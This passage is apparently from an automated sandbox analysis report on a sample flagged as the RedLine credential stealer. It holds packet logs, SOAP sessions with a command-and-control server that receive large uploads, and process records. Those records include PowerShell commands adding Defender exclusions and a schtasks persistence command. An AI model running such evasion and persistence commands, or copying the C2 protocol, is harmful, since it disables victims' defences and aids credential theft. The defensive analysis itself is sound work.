                    Jul 27, 2024 04:12:28.784703016 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784713030 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784724951 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784735918 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784744024 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.784758091 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784766912 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.784769058 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784780025 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784784079 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.784801006 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784806967 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.784812927 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784816980 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.784826040 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784837961 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784857988 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.784878969 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.784962893 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784975052 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784986019 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.784996986 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785002947 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785007954 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785015106 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785018921 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785031080 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785042048 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785043001 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785057068 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785064936 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785077095 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785084963 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785088062 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785094023 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785099983 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785110950 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785119057 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785121918 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785130024 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785132885 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785144091 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785156012 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785166979 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785171986 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785180092 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785191059 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785192966 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785202980 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785213947 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785218000 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785224915 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785235882 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785248041 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785253048 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785259962 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785271883 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785274982 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785283089 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785296917 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785300016 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785307884 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785319090 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785324097 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785330057 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785341024 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785341978 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785352945 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785376072 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785384893 CEST4971855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:28.785387039 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785397053 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785414934 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785427094 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785438061 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785449028 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785453081 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785463095 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785474062 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785486937 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785497904 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785507917 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785518885 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785583973 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785597086 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785609007 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785619974 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785633087 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785645008 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785655975 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785667896 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785681009 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785691977 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785702944 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785731077 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785742998 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785753965 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785764933 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785774946 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785801888 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785815001 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785825968 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785837889 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785850048 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785861015 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785871983 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785882950 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785897017 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785907984 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785952091 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785964012 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785974979 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785985947 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.785996914 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786007881 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786019087 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786030054 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786079884 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786091089 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786103964 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786115885 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786127090 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786138058 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786149025 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786159992 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786170959 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786181927 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786192894 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786205053 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786230087 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786242008 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786252022 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786262989 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786273956 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786284924 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786295891 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786308050 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786319017 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786329985 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786350965 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786362886 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786374092 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786386013 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786396980 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786407948 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786418915 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786429882 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786439896 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786451101 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786462069 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786493063 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786504030 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786515951 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.786528111 CEST5561549718185.222.57.151192.168.2.5
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jul 27, 2024 04:12:15.072236061 CEST | 63247 | 53 | 192.168.2.5 | 1.1.1.1
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Jul 27, 2024 04:12:15.072236061 CEST | 192.168.2.5 | 1.1.1.1 | 0x91a1 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Jul 27, 2024 04:12:15.079286098 CEST | 1.1.1.1 | 192.168.2.5 | 0x91a1 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
                    • 185.222.57.151:55615
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.5 | 49706 | 185.222.57.151 | 55615 | 3620 | C:\Users\user\Desktop\RgIbrhxoEx.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 27, 2024 04:12:08.972822905 CEST | 241 | OUT | POST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                    Host: 185.222.57.151:55615
                    Content-Length: 137
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Connection: Keep-Alive
                    Jul 27, 2024 04:12:09.555092096 CEST | 359 | IN | HTTP/1.1 200 OK
                    Content-Length: 212
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:08 GMT
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                    Jul 27, 2024 04:12:14.689630985 CEST | 224 | OUT | POST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                    Host: 185.222.57.151:55615
                    Content-Length: 144
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:14.861968040 CEST | 25 | IN | HTTP/1.1 100 Continue
                    Jul 27, 2024 04:12:14.959398031 CEST | 1236 | IN | HTTP/1.1 200 OK
                    Content-Length: 11637
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:13 GMT
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>113.91.141.250</b:string><b:string>112.20.141.71</b:string><b:string>123.246.126.11</b:string><b:string>14.216.97.151</b:string><b:string>211.136.225.172</b:string><b:string>117.30.116.225</b:string><b:string>223.73.226.107</b:string><b:string>223.73.137.72</b:string><b:string>139.186.206.86</b:string><b:string>121.32.179.90</b:string><b:string>14.155.32.179</b:string><b:string>27.187.215.170</b:string><b:string>122.242.151.246</b:string><b:string>112.20.141.181</b:string><b:string>110.87.4.123</b:string><b:string>121.27.85.165</b:string><b:string>59.41.188.218</b:string><b:string>218.71.255. [TRUNCATED]


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.5 | 49708 | 185.222.57.151 | 55615 | 3620 | C:\Users\user\Desktop\RgIbrhxoEx.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 27, 2024 04:12:18.164112091 CEST | 222 | OUT | POST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                    Host: 185.222.57.151:55615
                    Content-Length: 961769
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:19.710987091 CEST | 294 | IN | HTTP/1.1 200 OK
                    Content-Length: 147
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:17 GMT
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.5 | 49709 | 185.222.57.151 | 55615 | 7448 | C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 27, 2024 04:12:18.217052937 CEST | 241 | OUT | POST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                    Host: 185.222.57.151:55615
                    Content-Length: 137
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Connection: Keep-Alive
                    Jul 27, 2024 04:12:18.834283113 CEST | 359 | IN | HTTP/1.1 200 OK
                    Content-Length: 212
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:17 GMT
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                    Jul 27, 2024 04:12:23.884210110 CEST | 224 | OUT | POST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                    Host: 185.222.57.151:55615
                    Content-Length: 144
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:24.059897900 CEST | 25 | IN | HTTP/1.1 100 Continue
                    Jul 27, 2024 04:12:24.157140970 CEST | 1236 | IN | HTTP/1.1 200 OK
                    Content-Length: 11637
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:22 GMT
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>113.91.141.250</b:string><b:string>112.20.141.71</b:string><b:string>123.246.126.11</b:string><b:string>14.216.97.151</b:string><b:string>211.136.225.172</b:string><b:string>117.30.116.225</b:string><b:string>223.73.226.107</b:string><b:string>223.73.137.72</b:string><b:string>139.186.206.86</b:string><b:string>121.32.179.90</b:string><b:string>14.155.32.179</b:string><b:string>27.187.215.170</b:string><b:string>122.242.151.246</b:string><b:string>112.20.141.181</b:string><b:string>110.87.4.123</b:string><b:string>121.27.85.165</b:string><b:string>59.41.188.218</b:string><b:string>218.71.255. [TRUNCATED]


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.5 | 49711 | 185.222.57.151 | 55615 | 3620 | C:\Users\user\Desktop\RgIbrhxoEx.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 27, 2024 04:12:19.719541073 CEST | 242 | OUT | POST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                    Host: 185.222.57.151:55615
                    Content-Length: 961761
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Connection: Keep-Alive
                    Jul 27, 2024 04:12:21.212205887 CEST | 408 | IN | HTTP/1.1 200 OK
                    Content-Length: 261
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:19 GMT
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.5 | 49718 | 185.222.57.151 | 55615 | 7448 | C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 27, 2024 04:12:27.258871078 CEST | 222 | OUT | POST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                    Host: 185.222.57.151:55615
                    Content-Length: 961280
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:28.758013964 CEST | 294 | IN | HTTP/1.1 200 OK
                    Content-Length: 147
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:26 GMT
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                    Jul 27, 2024 04:12:28.761024952 CEST | 218 | OUT | POST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                    Host: 185.222.57.151:55615
                    Content-Length: 961272
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:29.549830914 CEST | 408 | IN | HTTP/1.1 200 OK
                    Content-Length: 261
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:28 GMT
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                    Target ID:0
                    Start time:22:11:59
                    Start date:26/07/2024
                    Path:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Imagebase:0x8b0000
                    File size:563'720 bytes
                    MD5 hash:304EA6D5CF3786D19DE14F004D7D057A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Imagebase:0x3a0000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Imagebase:0x3a0000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:6
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp"
                    Imagebase:0x550000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:7
                    Start time:22:12:06
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:8
                    Start time:22:12:06
                    Start date:26/07/2024
                    Path:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Imagebase:0xce0000
                    File size:563'720 bytes
                    MD5 hash:304EA6D5CF3786D19DE14F004D7D057A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    Target ID:9
                    Start time:22:12:06
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:10
                    Start time:22:12:07
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
